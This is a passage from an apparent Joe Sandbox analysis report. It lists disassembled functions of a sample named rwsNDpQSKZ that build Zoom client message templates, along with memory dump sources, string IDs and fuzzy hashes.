                  • Part of subcall function 00C5D6ED: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID), ref: 00C5D830
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@$ArchiveString$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: ProcessID$ProcessName$com.zoom.app.assistant_app_start
                • API String ID: 2715420528-3550085455
                • Opcode ID: d32888b65624a63ff46f9f7b42a5d2b500d046e197a05aae22e99650815daaff
                • Instruction ID: f1b394e37d3417f291f88ea7ecc969a5e96ee5f0a92ce298f34efc5c4d08ddd4
                • Opcode Fuzzy Hash: d32888b65624a63ff46f9f7b42a5d2b500d046e197a05aae22e99650815daaff
                • Instruction Fuzzy Hash: BBE0D8B4B40789ABE7206B455C55B3E76A4EB94B16F840928B2406B3D1CBF44C44DBB4
                Function 00C748A0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 25windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C748A7
                • ??0?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@H@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.Zoom.app.conf.zoom.internal.navigate.url.event,000027D0,url,actionType,00000004), ref: 00C748C7
                  • Part of subcall function 00C8B360: __EH_prolog3.LIBCMT ref: 00C8B367
                  • Part of subcall function 00C8B360: ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C6BA5C,com.zoom.app.notify.recaptcha.confirm,00002762,user_input,cancel,00000004), ref: 00C8B37A
                  • Part of subcall function 00C8B40D: __EH_prolog3_GS.LIBCMT ref: 00C8B414
                  • Part of subcall function 00C8B40D: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel,com.zoom.app.notify.recaptcha.confirm,00002762,user_input,cancel,00000004), ref: 00C8B43A
                  • Part of subcall function 00C8B40D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel,com.zoom.app.notify.recaptcha.confirm,00002762,user_input,cancel,00000004), ref: 00C8B468
                  • Part of subcall function 00C8B40D: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel,com.zoom.app.notify.recaptcha.confirm,00002762,user_input,cancel,00000004), ref: 00C8B4A5
                  • Part of subcall function 00C8B40D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel,com.zoom.app.notify.recaptcha.confirm,00002762,user_input,cancel,00000004), ref: 00C8B4D5
                  • Part of subcall function 00C8B40D: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel,com.zoom.app.notify.recaptcha.confirm), ref: 00C8B533
                  • Part of subcall function 00C8B40D: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel), ref: 00C8B550
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: actionType$com.Zoom.app.conf.zoom.internal.navigate.url.event$url
                • API String ID: 2703795933-2559254296
                • Opcode ID: 184fae6ce505df3d821550501bf74c232595c736daff2e88cce3ea3e6c530375
                • Instruction ID: 12d97ac99ed4c4e8e31b264d3aea4ea7c4bf756fa5c6e655e00170d1432bd606
                • Opcode Fuzzy Hash: 184fae6ce505df3d821550501bf74c232595c736daff2e88cce3ea3e6c530375
                • Instruction Fuzzy Hash: 28E0D8B0604788AFE7347B549C5AB2E6664EB50B19F04012CF2049E3E1CBF40D84D775
                Function 00C708A0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 25windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C708A7
                • ??0?$CmmMessageTemplate_2@II@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.zoom.app.log.subchannel_add,00009DA2,ChannelId,GroupId,00000004), ref: 00C708C7
                  • Part of subcall function 00C85120: __EH_prolog3.LIBCMT ref: 00C85127
                  • Part of subcall function 00C85120: ??0?$CmmMessageTemplate_1@I@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C67BBC,com.Zoom.app.mainboard.networkState,00004E29,State,Flag,00000004), ref: 00C8513A
                  • Part of subcall function 00C851CD: __EH_prolog3_GS.LIBCMT ref: 00C851D4
                  • Part of subcall function 00C851CD: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C67BE7,com.Zoom.app.mainboard.networkState,State,Flag,com.Zoom.app.mainboard.networkState,00004E29,State,Flag,00000004), ref: 00C851FA
                  • Part of subcall function 00C851CD: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C67BE7,com.Zoom.app.mainboard.networkState,State,Flag,com.Zoom.app.mainboard.networkState,00004E29,State,Flag,00000004), ref: 00C85228
                  • Part of subcall function 00C851CD: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C67BE7,com.Zoom.app.mainboard.networkState,State,Flag,com.Zoom.app.mainboard.networkState,00004E29,State,Flag,00000004), ref: 00C85265
                  • Part of subcall function 00C851CD: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C67BE7,com.Zoom.app.mainboard.networkState,State,Flag,com.Zoom.app.mainboard.networkState,00004E29,State,Flag,00000004), ref: 00C85295
                  • Part of subcall function 00C851CD: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C67BE7,com.Zoom.app.mainboard.networkState,State,Flag,com.Zoom.app.mainboard.networkState), ref: 00C852F3
                  • Part of subcall function 00C851CD: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C67BE7,com.Zoom.app.mainboard.networkState,State,Flag), ref: 00C85310
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@$Archive$CriticalH_prolog3MessagePackageSectionStringTree@$EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: ChannelId$GroupId$com.zoom.app.log.subchannel_add
                • API String ID: 3124793654-11220299
                • Opcode ID: 5884dd7e29d716437a8afeddca22d32c71f1c606734345aa17281f1aac89fbed
                • Instruction ID: 6a7b2bd9dea7242b10bf23ab1382a6fc3a80819675f85967e850d3e996b12b6f
                • Opcode Fuzzy Hash: 5884dd7e29d716437a8afeddca22d32c71f1c606734345aa17281f1aac89fbed
                • Instruction Fuzzy Hash: 58E092B0681785FBD711BB459C4AB2EA2A49B80B19F504128F2045E3C2CBF10C00CBB6
                Function 00C72810 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 25windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C72817
                • ??0?$CmmMessageTemplate_2@HH@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.zoom.app.cci.ccivideo.invitebyphonestatus.notify,00009E85,StatusCode,ReasonCode,00000004), ref: 00C72837
                  • Part of subcall function 00C8A460: __EH_prolog3.LIBCMT ref: 00C8A467
                  • Part of subcall function 00C8A460: ??0?$CmmMessageTemplate_1@H@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C6B29C,com.Zoom.app.notify.facemakeup.download,0000276F,type,index,00000004), ref: 00C8A47A
                  • Part of subcall function 00C8A50D: __EH_prolog3_GS.LIBCMT ref: 00C8A514
                  • Part of subcall function 00C8A50D: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C6B2C7,com.Zoom.app.notify.facemakeup.download,type,index,com.Zoom.app.notify.facemakeup.download,0000276F,type,index,00000004), ref: 00C8A53A
                  • Part of subcall function 00C8A50D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C6B2C7,com.Zoom.app.notify.facemakeup.download,type,index,com.Zoom.app.notify.facemakeup.download,0000276F,type,index,00000004), ref: 00C8A568
                  • Part of subcall function 00C8A50D: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C6B2C7,com.Zoom.app.notify.facemakeup.download,type,index,com.Zoom.app.notify.facemakeup.download,0000276F,type,index,00000004), ref: 00C8A5A5
                  • Part of subcall function 00C8A50D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C6B2C7,com.Zoom.app.notify.facemakeup.download,type,index,com.Zoom.app.notify.facemakeup.download,0000276F,type,index,00000004), ref: 00C8A5D5
                  • Part of subcall function 00C8A50D: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C6B2C7,com.Zoom.app.notify.facemakeup.download,type,index,com.Zoom.app.notify.facemakeup.download), ref: 00C8A633
                  • Part of subcall function 00C8A50D: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C6B2C7,com.Zoom.app.notify.facemakeup.download,type,index), ref: 00C8A650
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@$Archive$CriticalH_prolog3MessagePackageSectionStringTree@$EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: ReasonCode$StatusCode$com.zoom.app.cci.ccivideo.invitebyphonestatus.notify
                • API String ID: 3124793654-787523395
                • Opcode ID: 77b82cdc8bb6a92446dde56d643c1eafe211a6a69438a50c1253f56088a41386
                • Instruction ID: 543702142900076d1075883915107a901f0b00b402c5ea524d52706515e36780
                • Opcode Fuzzy Hash: 77b82cdc8bb6a92446dde56d643c1eafe211a6a69438a50c1253f56088a41386
                • Instruction Fuzzy Hash: 1AE022B2A04384BBFB00BB418889B3B7164EB80B08F90842CB2004A3C2CEF04C80D7B5
                Function 00C729F0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 25windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C729F7
                • ??0?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@H@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.zoom.app.cci.ccivideo.setvb.request,00009E8F,ImageLink,Type,00000004), ref: 00C72A17
                  • Part of subcall function 00C8B360: __EH_prolog3.LIBCMT ref: 00C8B367
                  • Part of subcall function 00C8B360: ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C6BA5C,com.zoom.app.notify.recaptcha.confirm,00002762,user_input,cancel,00000004), ref: 00C8B37A
                  • Part of subcall function 00C8B40D: __EH_prolog3_GS.LIBCMT ref: 00C8B414
                  • Part of subcall function 00C8B40D: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel,com.zoom.app.notify.recaptcha.confirm,00002762,user_input,cancel,00000004), ref: 00C8B43A
                  • Part of subcall function 00C8B40D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel,com.zoom.app.notify.recaptcha.confirm,00002762,user_input,cancel,00000004), ref: 00C8B468
                  • Part of subcall function 00C8B40D: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel,com.zoom.app.notify.recaptcha.confirm,00002762,user_input,cancel,00000004), ref: 00C8B4A5
                  • Part of subcall function 00C8B40D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel,com.zoom.app.notify.recaptcha.confirm,00002762,user_input,cancel,00000004), ref: 00C8B4D5
                  • Part of subcall function 00C8B40D: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel,com.zoom.app.notify.recaptcha.confirm), ref: 00C8B533
                  • Part of subcall function 00C8B40D: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel), ref: 00C8B550
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: ImageLink$Type$com.zoom.app.cci.ccivideo.setvb.request
                • API String ID: 2703795933-209218483
                • Opcode ID: 5edeb33053173001194c771b2b680699055e0bf993c32d0a30e91ef7c2cdcbf9
                • Instruction ID: c90ffe2bd9d3d06fca83991bdd4716e3484206aa7d89dcea377e5effba209769
                • Opcode Fuzzy Hash: 5edeb33053173001194c771b2b680699055e0bf993c32d0a30e91ef7c2cdcbf9
                • Instruction Fuzzy Hash: F3E092B0A44399ABD710BB459C86B7A3164AB90B29F048428F1145B3E1CBF40D04EF75
                Function 00C6C950 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 25windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6C957
                • ??0?$CmmMessageTemplate_2@IV?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.zoom.app.assistant_app_stop,00009C42,ProcessID,ProcessName,00000004), ref: 00C6C977
                  • Part of subcall function 00C85B10: __EH_prolog3.LIBCMT ref: 00C85B17
                  • Part of subcall function 00C85B10: ??0?$CmmMessageTemplate_1@I@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C85A32,?,?,?,?,00000004,00C6833F,com.Zoom.app.conf.start,00002718,ProcessID,ProcessName,RecoveryCommand), ref: 00C85B2A
                  • Part of subcall function 00C5D6ED: __EH_prolog3_GS.LIBCMT ref: 00C5D6F4
                  • Part of subcall function 00C5D6ED: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D71A
                  • Part of subcall function 00C5D6ED: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D748
                  • Part of subcall function 00C5D6ED: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D785
                  • Part of subcall function 00C5D6ED: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D7B5
                  • Part of subcall function 00C5D6ED: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify), ref: 00C5D813
                  • Part of subcall function 00C5D6ED: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID), ref: 00C5D830
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@$ArchiveString$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: ProcessID$ProcessName$com.zoom.app.assistant_app_stop
                • API String ID: 2715420528-856852631
                • Opcode ID: f0134983538e2dcd8473f76873f8f9e03e5ccbd8802106e0cda546bfa14caa2f
                • Instruction ID: fcfb34d3e5c8d5ff57f303e6850ea1713b535b71f7941d8857697773ba8f3179
                • Opcode Fuzzy Hash: f0134983538e2dcd8473f76873f8f9e03e5ccbd8802106e0cda546bfa14caa2f
                • Instruction Fuzzy Hash: 40E092B0A407956BE7106B465C56F2E75A4EB50B16F50442CF2005E3C1CEF40D04DF79
                Function 00C72930 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 25windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C72937
                • ??0?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@V12@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.zoom.app.cci.ccivideo.getsupportcountryinfo.response,00009E89,JsCallID,CountrysJson,00000004), ref: 00C72957
                  • Part of subcall function 00C85590: __EH_prolog3.LIBCMT ref: 00C85597
                  • Part of subcall function 00C85590: ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C85482,?,?,?,?,00000004,00C85365,?,?,?,?,?), ref: 00C855AA
                  • Part of subcall function 00C87CBE: __EH_prolog3_GS.LIBCMT ref: 00C87CC5
                  • Part of subcall function 00C87CBE: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive,00002727,MeetingID,Information,00000004), ref: 00C87CEB
                  • Part of subcall function 00C87CBE: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive,00002727,MeetingID,Information,00000004), ref: 00C87D19
                  • Part of subcall function 00C87CBE: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive,00002727,MeetingID,Information,00000004), ref: 00C87D56
                  • Part of subcall function 00C87CBE: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive,00002727,MeetingID,Information,00000004), ref: 00C87D86
                  • Part of subcall function 00C87CBE: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive), ref: 00C87DE4
                  • Part of subcall function 00C87CBE: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information), ref: 00C87E01
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@TreeV12@@
                • String ID: CountrysJson$JsCallID$com.zoom.app.cci.ccivideo.getsupportcountryinfo.response
                • API String ID: 9112088-914475299
                • Opcode ID: 30b9bb2b5af47d4e2b63a43ccfcee7a93eccde20fec7512e6f9aff2c5193689c
                • Instruction ID: 0a4cb8b7db0f91ccacb1a4a145fe03a972eedb23a810d8d0c56aada58debf228
                • Opcode Fuzzy Hash: 30b9bb2b5af47d4e2b63a43ccfcee7a93eccde20fec7512e6f9aff2c5193689c
                • Instruction Fuzzy Hash: 83E092B0B003857BEB10BB41A845B6E6664EF80B19F644518B2005B3E2CBF44C44C7B5
                Function 00C72AB0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 25windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C72AB7
